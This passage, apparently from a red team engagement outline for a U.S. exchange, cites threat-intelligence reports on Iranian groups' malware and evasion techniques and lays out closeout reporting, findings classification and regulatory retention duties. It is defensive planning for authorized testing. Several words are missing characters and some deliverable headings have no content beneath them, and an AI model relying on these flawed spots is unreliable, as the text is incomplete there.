2025Trellix Iranian Cyber Capability 2026 ReportDocuments APT35's dual-track development of BellaCPP and updated PowerLess backdoor with AMSI/ETW bypass, APT34's dual-channel C2 concealment inside Authorization Bearetokens, and MuddyWater's evolving malware suite (BugSleep, StealthCache, Phoenix, Fooder, MuddyViper, RustyWater) — directly informs Scenarios B, C, and F.
2025Symantec/Carbon Black MuddyWater U.S. Bank Detection (Mar 2025)First confirmed MuddyWater activity on a U.S. bank network; overlap with pre-conflict operational security posture suggesting deliberate preparation — highest-relevance historical data point for U.S. exchange MuddyWater scenario justification.

Phase 8 — Closeporting & Regulatory Deliverables

8.1 Purple Team Exercise

After covert red team phase concludes:

8.2 Findings Classification

All findings scored using CVSS v4.0 and mapped to NIST 800-53 Rev. 5 control families. Classified as Critical / High / Medium / Low. Critical findings are reviewed by legal counsel for SEC 8-K materiality assessment obligations per the four-business-day disclosure rule.

8.3 Required Deliverables

For Board / Executive Leadership (CSF 2.0 Govern; SEC Form 10-K Item 106):

For Technical Teams (NIST 800-53 CA-8; NYDFS §500.5):

For Compliance / Legal (NYDFS §500.17; SEC Rule 10; PCI DSS Req. 11.3):

8.4 Retention Requirements

All supporting records — including penetration testing rts, access control reviews, and cybersecurity program documentation — must be retained for five years under NYDFS Part 500. Evidence packages should be archived in a tamper-evident, access-controlled repository.


Legal Notice: This engagement outline is for authorized security professionals operating under formal contractual and legal agreements with explicit CFAA authorization. All tools, techniques, and scenarios must be used only within the scope of written authorization against systems owneby or explicitly consented to by the target organization. Engagement personnel must coordinate with qualified legal counsel to ensure compliance with the CFAA, applicable state laws, and SEC materiality obligations prior to commencing any active testing.